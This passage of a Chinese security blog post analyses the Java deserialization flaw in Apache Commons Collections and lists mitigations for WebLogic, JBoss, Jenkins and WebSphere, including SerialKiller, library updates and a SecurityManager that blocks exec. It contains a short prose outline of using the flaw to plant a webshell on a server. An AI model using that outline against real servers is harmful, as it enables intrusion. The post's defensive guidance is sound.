<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">漏洞分析</span><br><span class="line"></span><br><span class="line">　　引发：如果Java应用对用户输入，即不可信数据做了反序列化处理，那么攻击者可以通过构造恶意输入，让反序列化产生非预期的对象，非预期的对象在产生过程中就有可能带来任意代码执行。</span><br><span class="line">　　</span><br><span class="line">　　原因: 类ObjectInputStream在反序列化时，没有对生成的对象的输入做限制，使攻击者利用反射调用函数进行任意命令执行。</span><br><span class="line">　　　　　CommonsCollections组件中对于集合的操作存在可以进行反射调用的方法</span><br><span class="line">　　</span><br><span class="line">　　根源：Apache Commons Collections允许链式的任意的类函数反射调用</span><br><span class="line">　　　　　问题函数：org.apache.commons.collections.Transformer接口</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">　　利用：要利用Java反序列化漏洞，需要在进行反序列化的地方传入攻击者的序列化代码。</span><br><span class="line"></span><br><span class="line">　　思路：攻击者通过允许Java序列化协议的端口，把序列化的攻击代码上传到服务器上，再由Apache Commons Collections里的TransformedMap来执行。</span><br><span class="line">　  至于如何使用这个漏洞对系统发起攻击，举一个简单的思路，通过本地java程序将一个带有后门漏洞的jsp（一般来说这个jsp里的代码会是文件上传和网页版的SHELL）序列化，</span><br><span class="line">将序列化后的二进制流发送给有这个漏洞的服务器，服务器会反序列化该数据的并生成一个webshell文件，然后就可以直接访问这个生成的webshell文件进行进一步利用。 </span><br></pre></td></tr></table></figure>

<p> <strong>启发</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">开发者：</span><br><span class="line">　　为了确保序列化的安全性，可以对于一些敏感信息加密；</span><br><span class="line">　　确保对象的成员变量符合正确的约束条件；</span><br><span class="line">　　确保需要优化序列化的性能。</span><br><span class="line">漏洞挖掘：</span><br><span class="line">　　(1)通过代码审计/行为分析等手段发现漏洞所在靶点</span><br><span class="line">　　(2)进行POC分析构造时可以利用逆推法</span><br></pre></td></tr></table></figure>

<h1 id="漏洞修补"><a href="#漏洞修补" class="headerlink" title="漏洞修补"></a>漏洞修补</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">Java反序列化漏洞的快速排查和修复方案</span><br><span class="line"></span><br><span class="line">目前打包有apache commons collections库并且应用比较广泛的主要组件有Jenkins WebLogic Jboss WebSphere  OpenNMS。</span><br><span class="line">其中Jenkins由于功能需要大都直接暴露给公网。</span><br><span class="line"></span><br><span class="line">首先确认产品中是否包含上述5种组件</span><br><span class="line">使用grep命令或者其他相关搜索命令检测上述组件安装目录是否包含库Apache Commons Collections。搜索下列jar。</span><br><span class="line">commons-collections.jar</span><br><span class="line">*.commons-collections.jar</span><br><span class="line">apache.commons.collections.jar</span><br><span class="line">*.commons-collections.*.jar</span><br><span class="line">如果包含请参考下述解决方案进行修复。</span><br></pre></td></tr></table></figure>

<p>通用解决方案</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">更新Apache Commons Collections库</span><br><span class="line">　　Apache Commons Collections在 3.2.2版本开始做了一定的安全处理，新版本的修复方案对相关反射调用进行了限制，对这些不安全的Java类的序列化支持增加了开关。</span><br><span class="line"></span><br><span class="line">NibbleSecurity公司的ikkisoft在github上放出了一个临时补丁SerialKiller</span><br><span class="line">　　lib地址:https://github.com/ikkisoft/SerialKiller</span><br><span class="line">　　下载这个jar后放置于classpath，将应用代码中的java.io.ObjectInputStream替换为SerialKiller</span><br><span class="line">　　之后配置让其能够允许或禁用一些存在问题的类，SerialKiller有Hot-Reload,Whitelisting,Blacklisting几个特性，控制了外部输入反序列化后的可信类型。</span><br></pre></td></tr></table></figure>

<p>　　严格意义说起来，Java相对来说安全性问题比较少，出现的一些问题大部分是利用反射，最终用Runtime.exec(String cmd)函数来执行外部命令的。</p>
<p>　　如果可以禁止JVM执行外部命令，未知漏洞的危害性会大大降低，可以大大提高JVM的安全性。比如：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">SecurityManager</span> <span class="variable">originalSecurityManager</span> <span class="operator">=</span> System.getSecurityManager();</span><br><span class="line">    <span class="keyword">if</span> (originalSecurityManager == <span class="literal">null</span>) &#123;</span><br><span class="line">        <span class="comment">// 创建自己的SecurityManager</span></span><br><span class="line">        <span class="type">SecurityManager</span> <span class="variable">sm</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">SecurityManager</span>() &#123;</span><br><span class="line">        <span class="keyword">private</span> <span class="keyword">void</span> <span class="title function_">check</span><span class="params">(Permission perm)</span> &#123;</span><br><span class="line">            <span class="comment">// 禁止exec</span></span><br><span class="line">            <span class="keyword">if</span> (perm <span class="keyword">instanceof</span> java.io.FilePermission) &#123;</span><br><span class="line">                <span class="type">String</span> <span class="variable">actions</span> <span class="operator">=</span> perm.getActions();</span><br><span class="line">                <span class="keyword">if</span> (actions != <span class="literal">null</span> &amp;&amp; actions.contains(<span class="string">&quot;execute&quot;</span>)) &#123;</span><br><span class="line">                    <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">SecurityException</span>(<span class="string">&quot;execute denied!&quot;</span>);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// 禁止设置新的SecurityManager</span></span><br><span class="line">            <span class="keyword">if</span> (perm <span class="keyword">instanceof</span> java.lang.RuntimePermission) &#123;</span><br><span class="line">                <span class="type">String</span> <span class="variable">name</span> <span class="operator">=</span> perm.getName();</span><br><span class="line">                <span class="keyword">if</span> (name != <span class="literal">null</span> &amp;&amp; name.contains(<span class="string">&quot;setSecurityManager&quot;</span>)) &#123;</span><br><span class="line">                    <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">SecurityException</span>(</span><br><span class="line">                    <span class="string">&quot;System.setSecurityManager denied!&quot;</span>);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">checkPermission</span><span class="params">(Permission perm)</span> &#123;</span><br><span class="line">            check(perm);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">checkPermission</span><span class="params">(Permission perm, Object context)</span> &#123;</span><br><span class="line">            check(perm);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;;</span><br><span class="line">   System.setSecurityManager(sm);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>　　如上所示，只要在Java代码里简单加一段程序，就可以禁止执行外部程序了。 </p>
<p>　　禁止JVM执行外部命令，是一个简单有效的提高JVM安全性的办法。可以考虑在代码安全扫描时，加强对Runtime.exec相关代码的检测。</p>
<p><strong>针对其他的Web Application的修复</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line">Weblogic</span><br><span class="line">影响版本：Oracle WebLogic Server, 10.3.6.0, 12.1.2.0, 12.1.3.0, 12.2.1.0 版本。</span><br><span class="line">临时解决方案</span><br><span class="line">1 使用 SerialKiller 替换进行序列化操作的 ObjectInputStream 类；</span><br><span class="line">2 在不影响业务的情况下，临时删除掉项目里的</span><br><span class="line">“org/apache/commons/collections/functors/InvokerTransformer.class” 文件；</span><br><span class="line">官方解决方案</span><br><span class="line">官方声明: http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html</span><br><span class="line">Weblogic 用户将收到官方的修复支持</span><br><span class="line"></span><br><span class="line">Jboss</span><br><span class="line">临时解决方案</span><br><span class="line">1 删除 commons-collections jar 中的 InvokerTransformer, InstantiateFactory, 和InstantiateTransfromer class 文件</span><br><span class="line">官方解决方案</span><br><span class="line">https://issues.apache.org/jira/browse/COLLECTIONS-580</span><br><span class="line">https://access.redhat.com/solutions/2045023</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">jenkins</span><br><span class="line">临时解决方案</span><br><span class="line">　　1 使用 SerialKiller 替换进行序列化操作的 ObjectInputStream 类；</span><br><span class="line">　　2 在不影响业务的情况下，临时删除掉项目里的“org/apache/commons/collections/functors/InvokerTransformer.class” 文件；</span><br><span class="line">官方解决方案： Jenkins 发布了 安全公告 ，并且在1.638版本中修复了这个漏洞。</span><br><span class="line">官方的补丁声明链接:</span><br><span class="line">https://jenkins-ci.org/content/mitigating-unauthenticated-remote-code-execution-0-day-jenkins-cli</span><br><span class="line">https://github.com/jenkinsci-cert/SECURITY-218</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">websphere</span><br><span class="line">　　Version8.0，Version7.0，Version8.5 and 8.5.5 Full Profile and Liberty Profile</span><br><span class="line">临时解决方案</span><br><span class="line">1 使用 SerialKiller 替换进行序列化操作的 ObjectInputStream 类；</span><br><span class="line">2 在不影响业务的情况下，临时删除掉项目里的“org/apache/commons/collections/functors/InvokerTransformer.class” 文件</span><br><span class="line">在服务器上找org/apache/commons/collections/functors/InvokerTransformer.class类的jar，目前weblogic10以后都在Oracle/Middleware/modules下　　　　</span><br><span class="line">com.bea.core.apache.commons.collections_3.2.0.jar，创建临时目录tt，解压之后删除InvokerTransformer.class类后</span><br><span class="line">再改成com.bea.core.apache.commons.collections_3.2.0.jar</span><br><span class="line">覆盖Oracle/Middleware/modules下，重启所有服务。如下步骤是linux详细操作方法：</span><br><span class="line">A)mkdir tt</span><br><span class="line">B)cp -r Oracle/Middleware/modules/com.bea.core.apache.commons.collections_3.2.0.jar ./tt</span><br><span class="line">C)jar xf Oracle/Middleware/modules/com.bea.core.apache.commons.collections_3.2.0.jar</span><br><span class="line">D)cd org/apache/commons/collections/functors</span><br><span class="line">E)rm -rf InvokerTransformer.class</span><br><span class="line">F)jar cf com.bea.core.apache.commons.collections_3.2.0.jar org/* META-INF/*</span><br><span class="line">G)mv com.bea.core.apache.commons.collections_3.2.0.jar Oracle/Middleware/modules/</span><br><span class="line">H)重启服务</span><br><span class="line"></span><br><span class="line">重启服务时候要删除server-name下的cache和tmp</span><br><span class="line">例如rm -rf ~/user_projects/domains/base_domain/servers/AdminServer/cache</span><br><span class="line">rm -rf  ~/user_projects/domains/base_domain/servers/AdminServer/tmp</span><br></pre></td></tr></table></figure>

<h1 id="相关CVE"><a href="#相关CVE" class="headerlink" title="相关CVE"></a>相关CVE</h1><ul>
<li>CVE-2015-7501</li>
<li>CVE-2015-4852(Weblogic)</li>
<li>CVE-2015-7450(Websphere)</li>
</ul>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul>
        <li>Post title：Java反序列化漏洞分析</li>
        <li>Post author：ssooking</li>
        <li>Create time：2016-10-15 00:35:00</li>
        <li>
            Post link：https://ssooking.github.io/2016/10/java反序列化漏洞分析/
        </li>
        <li>
            Copyright Notice：All articles in this blog are licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> unless stating additionally.
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box">
                
                    <li class="tag-item">
                        <a href="/tags/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">#Java反序列化</a>&nbsp;
                    </li>
                
                    <li class="tag-item">
                        <a href="/tags/Java%E5%AE%89%E5%85%A8/">#Java安全</a>&nbsp;
                    </li>
                
            </ul>
        

        
            <div class="article-nav">
                
                    <div class="article-prev">
                        <a class="prev"
                           rel="prev"
                           href="/2016/11/msfvenom%E7%94%9F%E6%88%90payload/"
                        >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                            <span class="title flex-center">
                                <span class="post-nav-title-item">msfvenom生成payload</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2016/10/kali%E4%B8%8B%E5%88%A9%E7%94%A8rtl-sdr%E8%B7%9F%E8%B8%AA%E9%A3%9E%E6%9C%BA%E8%B7%AF%E7%BA%BF/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">Kali下利用rtl-sdr跟踪飞机路线</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
              <span>2016</span>
              -
            
            2023&nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;<a href="/">ssooking</a>
        </div>
        
        <div class="theme-info info-item">
            Powered by <a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;|&nbsp;Theme&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-arrows-alt-h"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%9B%B8%E5%85%B3%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99"><span class="nav-number">1.</span> <span class="nav-text">相关学习资料</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%83%8C%E6%99%AF"><span class="nav-number">2.</span> <span class="nav-text">背景</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%AE%A4%E8%AF%86Java%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">3.</span> <span class="nav-text">认识Java序列化与反序列化</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E7%9A%84%E4%BA%A7%E7%94%9F"><span class="nav-number">4.</span> <span class="nav-text">理解漏洞的产生</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">4.1.</span> <span class="nav-text">漏洞分析</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#POC%E6%9E%84%E9%80%A0"><span class="nav-number">5.</span> <span class="nav-text">POC构造</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98"><span class="nav-number">6.</span> <span class="nav-text">漏洞挖掘</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%9B%B8%E5%85%B3%E5%B7%A5%E5%85%B7"><span class="nav-number">7.</span> <span class="nav-text">相关工具</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%9E%E9%99%85%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83%E6%B5%8B%E8%AF%95"><span class="nav-number">8.</span> <span class="nav-text">实际漏洞环境测试</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E8%A1%A5"><span class="nav-number">9.</span> <span class="nav-text">漏洞修补</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%9B%B8%E5%85%B3CVE"><span class="nav-number">10.</span> <span class="nav-text">相关CVE</span></a></li></ol>
    </div>
</div>
        </aside>
    

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/dark-light-toggle.js"></script>



    
<script src="/js/local-search.js"></script>




    
<script src="/js/code-copy.js"></script>





<div class="post-scripts">
    
        
<script src="/js/left-side-toggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/toc.js"></script>

    
</div>



</body>
</html>
